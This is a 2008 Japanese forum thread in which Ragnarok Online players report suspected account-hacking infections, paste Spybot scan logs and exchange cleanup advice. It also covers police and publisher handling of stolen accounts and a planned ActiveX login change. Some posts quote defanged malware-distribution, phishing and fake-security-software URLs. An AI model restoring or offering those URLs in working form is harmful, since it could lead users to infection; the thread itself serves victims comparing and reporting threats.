P2P、フリーソフト、アップローダーからダウソしまくりだからなぁw <> （○口○*）さん<>sage<>08/07/31 05:48 ID:QzluSOT30<> ウイルス感染以外の理由でも、OSから再インストールが必要になる場合は少なくないから、日頃から必要なデータは
ちゃんとバックアップを取っておいた方がいいよ。
特にこの時期、落雷に絡んだクラッシュは多いし。 <> （○口○*）さん<>sage<>08/07/31 09:49 ID:OlHzPGzc0<> 仮想ブラウザでWebからの脅威を防ぐ「ZoneAlarm ForceField」
http://internet.watch.impress.co.jp/cda/news/2008/07/30/20431.html

対応OSはWindows Vista/XP、対応WebブラウザはInternet Explorer 7/6
およびFirefox 3/2/1。価格は3980円。 8月21日に発売。 <> （○口○*）さん<>sage<>08/07/31 10:31 ID:pTQP+INY0<> >>563
この仮想ブラウザ機能ってブラウザ側で標準設定されててもよさそうなものだが
そしたらウイルスに狙われるだけか。

まぁ仮想ブラウザ用ウイルスも作成されるんだろうな。
そして仮想ブラウザ用ウイルスを検出・削除するソフトが出来て
仮想ブラウザを仮想するブラウザが… <> （○口○*）さん<>sage<>08/07/31 11:53 ID:OlHzPGzc0<> DNSの脆弱性問題でISPに被害
米AT&TのISPが運営するDNSキャッシュサーバが攻撃を受け、Googleへの
トラフィックが別のサイトに誘導された。
http://www.itmedia.co.jp/news/articles/0807/31/news021.html

いよいよ笑えなくなってきた。 <> （○口○*）さん<>sage<>08/07/31 23:45 ID:geBML8tD0<> 　ROとは関係ないかもしれませんが、質問させてください。

【　　　気付いた日時　　　　　】 2008/07/31 22時頃
【不審なアドレスのクリックの有無　】　無し（ROアカハック対策スレまとめサイトhost追加分・リネージュ資料室・BS Wiki・Googleトップ程度しか開いておりません）
【他人にID/Passを教えた事の有無】　NO
【他人が貴方のPCを使う可能性の有無】　NO
【　　ツールの使用の有無　　　】　NO
【　ネットカフェの利用の有無　　　】　NO
【　　　 OS　　】　Windows XP Home Edition Version2002 Srevice Pack 3
【使用ブラウザ】 Firefox 2.0.0.16
【WindowsUpdateの有無】 7月半ばのアップデートが最後だと思います。
【　アンチウイルスソフト】カスペルスキーインターネットセキュリティ　6.0.2.614（Ver.7.0も使っていたのですが、ROがかなり重くなる為6.0に戻して使っています。）
【その他のSecurty対策】 BitDefenderコマンドライン版・Spybot S&D・ルータ・PG2
【ウイルススキャン結果】 Spybotにて『Hupigon13』検出　以下ログ貼り付け

Hupigon13: [SBI $B4B2695A] 設定 (レジストリ値, nothing done)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\sr\ImagePath=...\SystemRoot\...

Hupigon13: [SBI $2DB066C7] 設定 (レジストリ値, nothing done)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\sr\ImagePath=...\SystemRoot\...

【スレログやテンプレを読んだか】　Yes
【hosts変更】有/手動書き換え　2008/07/31　21時頃（ROアカウントハック対策スレのまとめサイトhost追加分・リネージュ資料室・BS Wikiを参考にしております。）
【PeerGuardian2導入】　有（ROアカウントハック対策スレのまとめサイト・リネージュ資料室・BS Wiki　のリストを使用しております。）
【説明】
　「もしかして誤検出じゃ？」と思えるところもあるので質問させていただきました。
　ほぼRO専用にしているPCなので、上記のサイト程度しか普段から見ていないPCなのですが（攻略サイト等の情報は別PCで見ています）、
　ひさしぶりにPCを起動（7/28から家を空けていた為。一人暮らしなので、その間に別の誰かが使用する事も無いと思います。）したので、
　各種ソフトでスキャンをかけてみたところ、Spybotで『Hupigon13』を検出しました。
　その後、カスペルスキーでフルスキャンをしてみたのですが、何もみつかりませんでした。
　7/28にも上記のセキュリティ対策ソフト各種でスキャンをしていたのですが、何も見つかっていません。

　本日、PCを起動してから行ったのが、
1・各種ソフトの定義ファイルアップデート
2・Host書き換えの為、上記3サイトでリスト集め
3・ROを起動してパッチサーバーに繋ぐ
4・BitDefender→SpyBot（ここで検出。検出画面のまま放置。）→カスペルスキー　の順でスキャン
　この程度だったので、怪しいリンクを踏んだとも思えないのですが…

　これに関して何かわかる方がいらっしゃいましたら、宜しくお願いします。 <> 566<>sage<>08/07/31 23:48 ID:geBML8tD0<> 追記で申し訳ないのですが、PG2でのブロックの形跡は何もありませんでした。 <> （○口○*）さん<>sage<>08/08/01 00:20 ID:t1OGaIxN0<> Spybotで発見後、削除したんじゃないの？ <> （○口○*）さん<>sage<>08/08/01 00:24 ID:t1OGaIxN0<> ごめん、よく見てなかった。削除しないで、検出後放置か…。

参考までに
http://questionbox.jp.msn.com/qa4069654.html?StatusCheck=ON
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR%5FHUPIGON%2EOHB&VSect=T

レジストリから「Debugger = "ntsd -d"」を検索して削除していくといいかもしれない。
セキュリティソフトの抑止を行なう模様。 <> （○口○*）さん<>sage<>08/08/01 00:26 ID:t1OGaIxN0<> dat落ちしてるようなので、ここの924以降参照。「ntsd -d」で入ってても正常なものもあるので注意。

http://209.85.175.104/search?q=cache:22YqIUd7XrkJ:pc11.2ch.net/test/read.cgi/sec/1172583844/924-944+Hupigon13&hl=ja&ct=clnk&cd=15&gl=jp <> 566<>sage<>08/08/01 18:01 ID:ENkZpZCUO<> 出先なので、携帯から失礼します。

>>568-570

わざわざリンクまで貼っていただき、ありがとうございます。
レジストリを弄る、との事なので少々不安ですが、念のためバックアップをとってから挑戦してみたいと思います。
ありがとうございました。 <> （○口○*）さん<>sage<>08/08/03 14:50 ID:jbyv6smI0<> >>406です。
無事にデータが復旧されました。
ここや他所を見る限り、復旧されるのはレアケースではなく、マニュアル通りに動けばたいてい復旧まで辿り着けるかと思います。 <> （○口○*）さん<>sage<>08/08/03 15:50 ID:jO8cY8zg0<> おめで㌧ <> （○口○*）さん<>sage<>08/08/03 19:40 ID:pzyAVaBM0<> 俺も今調査してもらってるんだけど、どうやら中華が串つかってやったとかいってた。
もう犯人特定はいいから調査を中断してもらって、さっさとアイテム復旧とか
してもらえないもんかな？ <> （○口○*）さん<>sage<>08/08/03 20:02 ID:mKF4g38g0<> 目的が違うだろ、復旧がメインじゃないぞ <> （○口○*）さん<>sage<>08/08/03 21:26 ID:5ZO6yI6V0<> > 串つかってやった
ここが重要だと思うぞ。
仮に、国内ISPからの接続が行われたのだとするならば、捜査権限が及ぶ範囲内になる訳だし。
直接の摘発にまでは至らなくても、ほいほいと連中の再契約を受け入れる何処ぞのISPへのプレッシャーにはなり得るw <> （○口○*）さん<>sage<>08/08/03 21:26 ID:6YwVyS2X0<> それは他人だから言えることだな
本人からすれば犯人が捕まっても無一文じゃ事実上強制引退だし復旧のが重要だろ <> （○口○*）さん<>sage<>08/08/03 21:32 ID:FF1ijsBQ0<> 経過を癌のフォームにも投げて、復旧早くしろとせっつけ。

それと同時に警察に対しても、随時進捗確認を行なって、串に利用されたor串を用意した奴にまで辿り着いて貰え。 <> （○口○*）さん<>sage<>08/08/03 21:34 ID:pzyAVaBM0<> >>577
そうなのよ。
他人はやられてないからいいけど
やられた側からしたら犯人はどうでもいいから
とっとと復旧させてほしいんだよね。
不正アクセスの被害にあったって言う調査結果がでたら
ガンホーも復旧してくれるって言ってるし。

自己責任なのに無責任なこと言ってるのは重々承知のつもり。 <> （○口○*）さん<>sage<>08/08/03 21:38 ID:v8wNHMV90<> >574
それは癌に掛け合っての話で、ここで言っても仕方がない。
復旧するのは癌であって、スレ住人じゃないんだし。

このスレの住人が出来る事は
「こまめに問い合わせして、復旧を急いで貰うよう働きかけろ」
ぐらいのアドバイスだけだ。 <> （○口○*）さん<>sage<>08/08/03 21:46 ID:pzyAVaBM0<> Gvで暇防衛だったんでついぐちってしまってすまない。
もう消えるとするよﾉｼ <> （○口○*）さん<>sage<>08/08/04 03:08 ID:ImO9XGcy0<> PG2をインストしようとすると「Access violation at address 004096DA. Wreite of address 00401000」
としか出ずに先に進めません。
何かお知りの方は居ませんか？ <> （○口○*）さん<>sage<>08/08/04 03:13 ID:eAUcB7ut0<> エラーメッセージでぐぐった？ <> （○口○*）さん<>sage<>08/08/04 09:40 ID:/4NXpOWv0<> >>582
よくわからないが、MEMTEST86+でメモリチェックした方がよくね？ <> （○口○*）さん<>sage<>08/08/04 10:44 ID:uA3CSVbu0<> 【　　　気付いた日時　　　　　】 8/2 夕方頃
【不審なアドレスのクリックの有無　】なし
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【　　ツールの使用の有無　　　】 No
【　ネットカフェの利用の有無　　　】 Yes
【　　　 OS　　】 XP SP3
【使用ブラウザ】 IE6.0
【WindowsUpdateの有無】毎日
【　アンチウイルスソフト】 AVG
【その他のSecurty対策】 Spybot S&D
【ウイルススキャン結果】問題なし
【スレログやテンプレを読んだか】 Yes
【hosts変更】有 6月末あたり
【PeerGuardian2導入】無
【説明】上記の時間に「別のIDでログイン」という形で落とされすぐにログイン＞また入られるを5回ほど繰り返し
サブPCのほうでｶﾞﾝﾎｹﾞｰﾑｽﾞからPASS等すべてを変更して何とかなりました。
日曜日は問題なかったです。

1.5倍期間に○活空間のネカフェを利用その際ウィルスチェックは行っていませんでした。
同じ期間に利用していた友人も別の店舗ではありますが垢ハックの被害にあっています・・。
やはりネカフェ利用の際はウィルスチェックとPASS変更は怠っちゃいけないですね。 <> （○口○*）さん<>sage<>08/08/04 11:23 ID:OwKxb6g50<> というか、その危ないネカフェをどんどん晒せる場所があればいいんだけれどね。
ひとまず被害が増えないようお店に報告しましょう。

チェーン店なら、店舗でなく元締めの方にいれると。 <> （○口○*）さん<>sage<>08/08/04 12:29 ID:YZI2a9AW0<> 全てのネカフェが危険なのは変わりないし、晒しってやつは捏造が入りやすいから微妙だな。 <> 582<>sage<>08/08/04 12:39 ID:ImO9XGcy0<> エラーメッセージでぐぐって調べれる限りの対策（HDD容量、Div更新等）はしたのですが分かりませんでした
MEMTEST86+はUSBを起動ディスクにして試しましたが、これも良く分かりません

【　　　気付いた日時　　　　　】 8/3
【不審なアドレスのクリックの有無　】ROM776に貼り付けられたハックアドレス
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【　　ツールの使用の有無　　　】 No
【　ネットカフェの利用の有無　　　】 No
【　　　 OS　　】XPsp2ver2002
【使用ブラウザ】 Firefox 2.0.0.16
【WindowsUpdateの有無】半年前
【　アンチウイルスソフト】無
【その他のSecurty対策】 NOD32
【ウイルススキャン結果】まだです
【スレログやテンプレを読んだか】今から読みます
【hosts変更】無　
【PeerGuardian2導入】無
【説明】 (被害状況を詳しく書く)
掲示板の垢ハックと思われるアドレスを踏みました
現在記事が削除されてしまった+履歴に残っていないのでアドレスは分かりません
感染したと思われるPCはオフライン状態にして携帯で垢IDpassを変更して、今は知人宅のPCから操作しています <> （○口○*）さん<>sage<>08/08/04 13:04 ID:YZI2a9AW0<> >>588
ハックアドレスを踏んだと分かってるのなら、PG2の導入は置いておいて
まずウイルススキャン（できればOS再インストール）をやらないと駄目。
とにかくPCを安全な状態に戻すのが最優先。 <> （○口○*）さん<>sage<>08/08/04 13:47 ID:TuIFve/00<> 誰も触れてないけど、GameGuardが動作してると特定のインストーラが
そのエラーを吐いて動作しない。 <> （○口○*）さん<>sage<>08/08/04 14:00 ID:ImO9XGcy0<> spybotでの検査結果が8件

Windows Security Center.FirewallDisableNotify: 設定 (レジストリ変更, nothing done)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify!=dword:0
Windows Security Center.AntiVirusDisableNotify: 設定 (レジストリ変更, nothing done)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify!=dword:0
Advertising.com: トラッキングcookie (Firefox: default) (Cookie, nothing done)
Advertising.com: トラッキングcookie (Firefox: default) (Cookie, nothing done)
Advertising.com: トラッキングcookie (Firefox: default) (Cookie, nothing done)
Advertising.com: トラッキングcookie (Firefox: default) (Cookie, nothing done)
Avenue A, Inc.: トラッキングcookie (Firefox: default) (Cookie, nothing done)
DoubleClick: トラッキングcookie (Firefox: default) (Cookie, nothing done)

NOD32では感染オブジェクト0件でした。
これからクリーンインストールをしてみます

>>590
nProの事でしょうか？ <> （○口○*）さん<>sage<>08/08/04 14:04 ID:vjl1vknj0<> NODは割りとザル、軽いだけだな… <> （○口○*）さん<><>08/08/04 17:00 ID:CLyiVNmh0<> Trojan.Win32.Inject.dzc
とかmixiにも良く張られているけれど、
あれというのは張った本人が自らの意思で張っているん?
それともウィルスがイタズラした結果なんだろか? <> （○口○*）さん<>sage<>08/08/04 17:28 ID:OwKxb6g50<> >>593
怪しいリンクを貼り付けていく奴？ならアカウントハックと見て良いよ。
オイタしたIDをNGにかけていくと、前に登録したIDがなくなっている事もある。 <> （○口○*）さん<>sage<>08/08/04 17:31 ID:CLyiVNmh0<> なるほど悪意の書き込みなのね。 <> （○口○*）さん<>sage<>08/08/04 17:59 ID:/4NXpOWv0<> >>593
投稿者に問い合わせると、見に行った事もないという返答が帰ってきたりする。

mixiの垢ハックして、特定のキーワードに反応する記事に自動コメントをつけにいく形だよ。
悪意のある投稿者は、投稿者のパスをハックした業者（？）だと思っていた方がいい。

運営に通報すると同時に、投稿者のプロフや日記を見て、普通だったらそっちにも報告入れるとベスト。
投稿者の人が、mixiのアカハック除去してパス変更しない限り（または運営がそのIDを停止しない限り）
余所で繰り返される事になるから。 <> L ★<>sage<>08/08/04 19:50 ID:???0<> 203.152.211.10*.static.zoot.jp
889 名前：(^ー^*)ノ～さん[] 投稿日：08/08/04(月) 12:19 ID:4663ST910
http://www◎gaimima130◎com◎2◎jpg
ラグナロクオンラインがDSのゲームになるのかぁ
レベル６０くらいまでやってた自分としては[興味があります。 <> （○口○*）さん<>sage<>08/08/04 20:48 ID:pYDGKpXn0<> ただの画像じゃんか <> （○口○*）さん<>sage<>08/08/04 20:50 ID:/4NXpOWv0<> >>597
報告ありがとうございます。削除依頼スレに出てた「ウィルス詰め合わせサイトと思わしきurl」という奴ですね。
ttp://www■gaimima130■com/2■jpg

「www■gaimima130■com」→「61■139■126■15」
案の定、中国のアドレスのようですが・・・ファイルそのものは、普通にJpegっぽいです。
Virustotalでも0/36。襟元のスカーフっぽいものが写ってるだけの画像。ロゴを見る限りではアダルト系？

投稿した人はなにをしたかったんでしょうね。 <> （○口○*）さん<>sage<>08/08/04 20:53 ID:/4NXpOWv0<> （追記）

危険な可能性のあるファイルとして、一応、バイナリエディタで覗いて、JPEGであることを確認してから
ファイルを開いています。なにも考えずに開いちゃったりはしていません。 <> （○口○*）さん<>sage<>08/08/04 21:25 ID:4vR7GSF40<> >>600
JPEG展開コードに脆弱性があった場合、それでは防げないのでは。 <> （○口○*）さん<>sage<>08/08/04 21:30 ID:/4NXpOWv0<> >>601
その通り。その辺は、言い出したらきりがないので、自己責任のリスクをできる範囲で減らしていくことが重要ですってだけ。 <> 591<>sage<>08/08/04 22:14 ID:ImO9XGcy0<> 無事再インストールを済ませ、カスペ先生を導入しました
avp.exeでハングアップしかけてしまいましたが…

ご相談に乗っていただいてありがとうございました <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/08/05 04:31 ID:ufdYnDKJ0<> >>597 >>599
ちょっと前に>>369で報告があったドメインだったりします。

ソースチェッカーでドメイン名をそのまま掛けてみると
ぱっと見ソースでgifファイルやら気になりましたが
枠外にwww■gaimima130■com/wmv■exeの文字。
ウイルス入りのものでもダウンロードさせる…のかな…とか。 <> （○口○*）さん<>sage<>08/08/05 04:34 ID:PTP63PB+0<> ROM776の削除されたものは>>369のlivedoormだったですね。
文面は>>597でした。 <> （○口○*）さん<>sage<>08/08/05 09:27 ID:M4yphMwf0<> アカウントハッキングがこれだけ蔓延しているのに、捕まえられないってもどかしいもんだな。 <> （○口○*）さん<>sage<>08/08/05 17:03 ID:UNuiEioa0<> なんかwikipediaがブロックされないから変だと思って調べたら、
全部かどうか知らんけどサーバーがアメリカになったのね。
混乱する人いるかもしれないから一応報告。 <> （○口○*）さん<>sage<>08/08/05 17:49 ID:sK92qw4Y0<> OpenDNSでも使ってるのかい <> 607<>sage<>08/08/05 18:39 ID:UNuiEioa0<> 書き忘れ、PG2での話ね。
既出だったら申し訳ない。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/08/05 19:51 ID:aP9Q2lEd0<> リネージュ資料室さんの
セキュリティ対策(ウィルス情報-ウィルス更新状況)から
www■excite-blog■com(2008/08/04 11:22:29)の[script]のデータ部分で
こんな感じの抜き出しがありました。いくつか抜粋。

adimp■excite■co■jp
image■excite■co■jp/jp/css/top/images/08headerDPbg■gif
(中略)
mage■excite■co■jp/jp/top/front/MenuBars■jpg
image■excite■co■jp/jp/top/front/mPageArr■gif
image■excite■co■jp/jp/top/front/prDot■gif
image■excite■co■jp/jp/top/front/preview_mode■png
image■excite■co■jp/jp/top/front/qrLine■gif
image■excite■co■jp/jp/top/swf/exciteTopClock■swf
www■excite■co■jp/
www■excite■co■jp/dictionary/

上記URLは本物のエキサイトブログのイメージデータだと思ったのですが
ハックサイトのwww■excite-blog■comが偽装を凝らす為に
本物の最新の画像データやらを直リンクで呼び出しているという事なのでしょうか？

本物のサイトのイメージ画像に罠を混ぜている…なんて事は無いと思うのですが
ちょっと気になったので書き込みまで。 <> （○口○*）さん<>sage<>08/08/05 19:54 ID:XtOPsC8Z0<> >>607
どうりでブロックされなくなったのか <> （○口○*）さん<>sage<>08/08/05 20:22 ID:2sVSeoIX0<> >>610
罠はない、というかexciteのトップをパクったんじゃないかな。
(ディレクトリなしの)ルートにアクセスして
(aguseなどに投げて)確認する奴のために
本物のexciteを装ってるんでしょ。 <> （○口○*）さん<>sage<>08/08/05 21:59 ID:tuSIlzzd0<> 先ほどRO終了時に下のサイトが表示されたました、セキュリティーのダウンロードを促してきたのですが
怖かったので直ぐ×で閉じたのですが、有害URLかわかりません。
どなたか判別していただけないでしょうか

http://supashuri■com/soshi/index■php?52510-c0e54-43165-2050a-0c553-95f57-6e0e1-3541f-0b085-05f5b-00485-f5714-09560-50143-59050-a5007-17100-80f57-13555-c5952-40541-53b50-0c560-a0c02-000b5-a6c00-03510-33e05-53020-75044-41045-10b01 <> （○口○*）さん<>sage<>08/08/05 22:18 ID:rEUZjZLa0<> ■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■ <> （○口○*）さん<>sage<>08/08/05 22:36 ID:nA1OnDRQ0<> >>613
自己責任で判断しろや。

ttp://supashuri■com -> USのIP
ちなみにカスペ入ってる状況でそのアドレスを落とそうとすると、「フィッシング攻撃」として警告されます。

偽セキュリティソフトの押し売りに注意
http://secure.blog.ocn.ne.jp/column/2008/02/post_65bb.html

偽セキュリティーソフトにご用心
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20071009nt0e.htm

記者も体験，偽セキュリティ・ソフトのだましの手口
http://itpro.nikkeibp.co.jp/article/OPINION/20060627/241921/ <> （○口○*）さん<>sage<>08/08/05 23:29 ID:4Pn5Zagr0<> 今日のメンテで復旧してもらいました
1月31日　AVASTがあるからと安心して掲示板からURLを踏んで感染(2月1日にあれだったんじゃないかと思いウイルスバスター体験版で検索して見つかりました)
2月1日　朝起きてInすると装備・Zenyがほぼ空。プロの露店で自分の名前入りジルタス仮面もあったことからアカハクと確信。すぐにガンホーに捜査依頼。
2月2日　サイバー課に電話し、状況を説明すると最寄の警察所へ状況を説明し連絡を入れさせると言われる
2月5日　最寄の警察署から電話。初めての事例で良く分からないから来てくれとのことで出向く。　生活安全課の方にガンホーID、PASS。ラグナロクID、PASS。その他個人情報を伝え「何かつかめたら連絡する」と言われる
2月12日　警察からあなたのISPに問い合わせるのに資料が必要だから持って来いと言われ30分かけて行くも「やっぱり使わないわ」
5月？日　忘れられているのではないかと思いこちらから電話。ガンホーと協力しているが相手のIPがつかめず捜査が難航しているからもう少し待って欲しいと言われ待つ。
7月下旬　いい加減いいんじゃないかな？と電話すると「犯人の特定は不可能だからそれは諦めてくれ、担当がいないからかけ直させる」とのことで2日ほど待つと、
「この前捜査は終ってた。不正アクセスがあったのは間違いないだろうからガンホーに連絡しておくね。これで捜査打ち切りだから」
これを聞きガンホーのヘルプデスクに投稿。

「そのようでございましたら、弊社担当者よりご相談いただいた警察機関へ
ご連絡させていただきますので、
以下の情報に関して、ご連絡をいただけますよう、お願いいたします。」

協力して捜査してたんじゃないのか？と思ったが警察機関だけを伝え今日まで放置。

8月5日18時20分　復旧完了と投稿内容を通じて運営から返答

向こうも忙しいのか捜査が完了していても連絡してくれないようです。1ヶ月に1度くらいなら連絡してもいいのではないでしょうか。

きちんと捜査していただけるようなので被害に合われた方は泣き寝入りせず連絡することをおすすめします。
駄文ですがみなさんのお役に立てば幸いです <> （○口○*）さん<>sage<>08/08/06 08:59 ID:oe43ZD+W0<> >ガンホーID、PASS。ラグナロクID、PASS

パスワードは誰にも教える必要ないし、教えてはならんのでは…。 <> （○口○*）さん<>sage<>08/08/06 12:40 ID:xmms1cUX0<> 丸々7ヶ月かぁ・・・ <> （○口○*）さん<>sage<>08/08/07 12:39 ID:VNne+QWd0<> やっぱり垢ハクの対応は警察署次第ってことか <> （○口○*）さん<>sage<>08/08/07 12:55 ID:NbakvONu0<> 警察次第というか、刑事事件だからって丸投げしたら
誰も頑張ってくれないと思う <> （○口○*）さん<>sage<>08/08/07 14:40 ID:V/KO1MvR0<> 警察は忙しいから、ちょっとくらい邪魔と思われても連絡して大丈夫
むしろ掛けないと忘れられるほうが多い

毎週決まった曜日(できれば週中の朝一と昼以外。金～月はわりと忙しそう)に
状況を教えてください→1～2分聞く→何かあったらご連絡ください。また来週電話します、と伝える
これで次回予告ができるから進展あってもなくても掛ける口実になるし
進展ないなら無いでもいいから話を聞きたいと伝えておけば断られない

職場の都合で週40通位、国内の刑事課(盗犯課多め)の人と書類のやり取りをしてたが
年末年始だったり都心部じゃなければ電話もできないほど忙しくはないよ
（ニュース等の大捜索とかやってたら別、とはいっても担当者が決まってるなら遠慮しなくてＯＫ）
山の手沿線でも忙しいところとそうでないところははっきり別れてた位だし気にしないで大丈夫 <> （○口○*）さん<>sage<>08/08/07 14:53 ID:yL+2/vgs0<> そりゃ普段から忙しかったら、何かあって処理能力超えたら問題になるしね。 <> （○口○*）さん<>sage<>08/08/07 15:28 ID:ZHFeoIln0<> 毎日とかはさすがに邪魔になるだろうけど、週イチくらいなら、
むしろ積極的に問い合わせと確認したほうがいいんじゃね。
問い合わせが多ければ警察側の今後の腰の入れ方も変わってくるだろうし。 <> （○口○*）さん<>sage<>08/08/07 23:27 ID:g25tCCNl0<>
ttp://www.gungho.jp/index.php?module=Page&action=NoticeDetailPage¬ice_id=1255

＞オンラインゲームのログイン方法が変わります 2008/08/06
＞
＞いつもガンホーゲームズのオンラインゲームをご愛顧いただきましてありがとうございます。
＞ガンホーゲームズではユーザーの皆様に、よりわかり易いゲームプレイ環境を提供させていただくため、
＞オンラインゲームへのログイン方法を「Web上からGungHo-IDひとつでログイン」
＞できる方法へ順次変更させていただきます。
＞
＞変更されるタイトルと変更日は？
＞
＞▼ログイン方法が変わるタイトル/変更予定日
＞タイトル変更予定日時
＞エミル・クロニクル・オンライン 2008年8月21日（木）15:00
＞覇拳伝 2008年8月21日（木）15:00
＞ドデカオンライン 2008年8月28日（木）15:00
＞TANTRA 2008年9月03日（水）15:00
＞ラグナロクオンライン 2008年8月下旬～ 2008年9月下旬
＞北斗の拳ONLINE 未定
＞ヨーグルティング未定
＞
＞また、2008年8月21日より一部ガンホーのサービスに関する用語も変更させていただきます。
＞　変更前：GungHo-ID 　⇒ 　　変更後：ガンホーID
＞　変更前：アトラクションID 　⇒ 　　変更後：ゲームアカウント
＞
＞※ 本内容は用語のみの変更となります。変更後もお客様のGungHoーID文字列は変更されません。
＞ GungHo-IDの現在の英数字の文字列がそのままご利用いただけます。
＞また、アトラクションIDを複数お持ちの場合には全て継続してご利用いただけますので、
＞ご安心ください。ログイン方法は後日ご案内いたします。
＞※ 本変更導入期間の前後に実施される一部のキャンペーンや販売チケットにおいて、
＞変更後の用語で表記されていただく場合がございます。ご了承ください。
＞※ 本変更にともない、各ゲームのプレイ必要環境にInternetExplorer6.0以上が必要となります。
＞他のブラウザでも利用できる場合がありますが、上記ブラウザのみをサポート対象とさせていただきます。

ハンゲとかの方式になるんかよ。ActiveX使用だからセキュ的に嫌なんだよなぁ… <> （○口○*）さん<>sage<>08/08/07 23:39 ID:NbakvONu0<> ポータル不人気だからって強制誘導かよ <> （○口○*）さん<>sage<>08/08/08 01:26 ID:sScipx4s0<> 癌IDまで垢ハックされるようになるわけか <> （○口○*）さん<>sage<>08/08/08 01:42 ID:oLrXgoId0<> 強制的にIE使えってことかよ…
IETabを使えばFirefoxも対応可能だけどさ

強制的にIE使えってのが一番もにょる。 <> （○口○*）さん<>sage<>08/08/08 01:44 ID:h5Peya/60<> アカウント切り替えるたびにクラ再起動とかは避けてほしいなぁ。 <> （○口○*）さん<>sage<>08/08/08 03:00 ID:+0c9X5Da0<> あぁ、IETab入れないでやってきたが、仕方ないな。 <> （○口○*）さん<>sage<>08/08/08 03:10 ID:XXE+EpXf0<> アカハック対策としてActiveX と Java applet をOFFにしてる俺にとって
ActiveX必須になる変更は武装解除命令に等しい。 <> （○口○*）さん<>sage<>08/08/08 04:04 ID:7JtEpvcd0<> 折角落ち着いてきたのに、またVistaの整合性レベルでgdgdになりそうだな。
それに加えて、導入後は癌ポータルのフィッシングサイトが出てくるのではなかろうか。
DNSの脆弱性も影響力が強まるだろうし、困った物だ。 <> （○口○*）さん<>sage<>08/08/08 04:32 ID:1pUhL2ev0<> >>624
うわー、この方式嫌いなんだよ… <> （○口○*）さん<>sage<>08/08/08 11:25 ID:d+Iyy16x0<> ハンゲはOperaでも動くからいいが
癌のはどうせIEでしか動くまい… <> （○口○*）さん<>sage<>08/08/08 11:26 ID:AFYPkEtF0<> Operaって外部プログラム起動できる仕組み持ってるの？
Firefoxはプラグインがあるけれど。 <> （○口○*）さん<>sage<>08/08/08 11:29 ID:jZiVVKuT0<> 抗議の投稿しまくれば現在の形式のままにしてくれるかもしれないぜ…
俺はそれに期待するわ… <> （○口○*）さん<>sage<>08/08/08 11:48 ID:0iH03vjp0<> >>634
一応右クリメニューにIEで開くが追加できる <> （○口○*）さん<>sage<>08/08/08 12:00 ID:1pUhL2ev0<> >>634
OperaもSafariもNetscapeプラグイン動くでしょ。Fxと同様に。
# じゃなきゃFlash再生すらできない。 <> （○口○*）さん<>sage<>08/08/08 12:10 ID:AFYPkEtF0<> >>637
Firefoxの場合は、プラグインが「非公認」だと胡散臭さ満点になるよ。
ActiveXなら署名で判断できるけれどね。

ま、対応しないだろうけれど。 <> （○口○*）さん<>sage<>08/08/08 12:18 ID:1pUhL2ev0<> Netscapeプラグイン自体がそういう古い仕組みなんだからしゃーない。
AppleとMozillaとOperaあたりでActiveXコントロールと
せめて肩を並べる仕組みを作れんもんかねぇ。 <> （○口○*）さん<>sage<>08/08/08 12:31 ID:sReaFTxJ0<> >>639
AppleとMozillaとOperaが肩を並べて標準規格を定めても
天下のMSサマは独自路線を貫きます（例：JavaScript） <> （○口○*）さん<>sage<>08/08/08 12:44 ID:7JtEpvcd0<> >>638,639
Mozilla界隈は署名のような仕組みを作らずとも、MPLによるソース公開で同一性を担保していく事になるんでね。
実質はMPL/GPL/LGPLの多重派生になるから、考えようによってはバイナリ署名より堅苦しいかも知れないけれど。 <> （○口○*）さん<>sage<>08/08/08 15:11 ID:1pUhL2ev0<> その公開されているソースコードと、今ユーザが入れている(あるいは入れようとしている)
プラグイン(あるいはソースコード)が同一であることの検証を「ブラウザが」「自動で」
やってくんないと話になんないんすよ。
日本語の次に得意な言語はCです、なんて言うようなアレゲな界隈の人と違って。 <> （○口○*）さん<>sage<>08/08/08 15:28 ID:F02LD81T0<> ソースのハッシュを見ても意味ないしな… <> （○口○*）さん<>sage<>08/08/08 19:37 ID:FKlEnrFn0<> ActiveXがウイルスチェッカー反応しまくりな作りだったりして <> （○口○*）さん<>sage<>08/08/08 20:03 ID:OkuwCdAX0<> ネカフェじゃもう危なっかしくてプレイできねーな。
癌IDがハック対象になるから、帰宅までの時間も稼げやしねぇ。 <> （○口○*）さん<>sage<>08/08/08 20:52 ID:+0c9X5Da0<> 問題の端末を見つけたとき、ガンホーにも苦情入れた方がいいのかもしれんね。
公認カフェの端末に垢ハックのプログラムが入っていたら、かなり問題あるし。 <> （○口○*）さん<>sage<>08/08/08 21:31 ID:du/FjHNS0<> 癌に言って何とかなる物じゃないだろ <> （○口○*）さん<>sage<>08/08/08 22:20 ID:+0c9X5Da0<> 問題のある公認カフェがある、って苦情がガンホーの参考に
ならなかったら本当の屑会社じゃないか。 <> （○口○*）さん<>sage<>08/08/08 22:37 ID:du/FjHNS0<> どういう事を期待しているのかさっぱりわからない <> （○口○*）さん<>sage<>08/08/08 22:40 ID:h5Peya/60<> 公認取り消しで十分じゃない？
公認ネカフェに特権がある現状、公認でなくなることは
RO目当ての客足が多少なりとも遠のくわけだから
ネカフェにとっても意味のあるペナルティだと思うけど。 <> （○口○*）さん<>sage<>08/08/08 23:09 ID:+0c9X5Da0<> 公認てのは、ガンホーのお墨付きってことだからね。
そこで垢ハックがあれば問題ありすぎるよ。 <> （○口○*）さん<>sage<>08/08/08 23:13 ID:du/FjHNS0<> まずはその店舗と本社、それでしばらくしても改善されないならアリかもしれないけど
いきなり癌に公認取り消せとかってのはクレーマー過ぎないか？ <> （○口○*）さん<>sage<>08/08/08 23:18 ID:+0c9X5Da0<> ガンホーに報告しなかったら内々で済ませておわっちゃうでしょ
だから連絡するんだよ <> （○口○*）さん<>sage<>08/08/08 23:30 ID:t8lSV6NV0<> >>652
いやいやいきなり公認取り消せと言うんじゃなくて
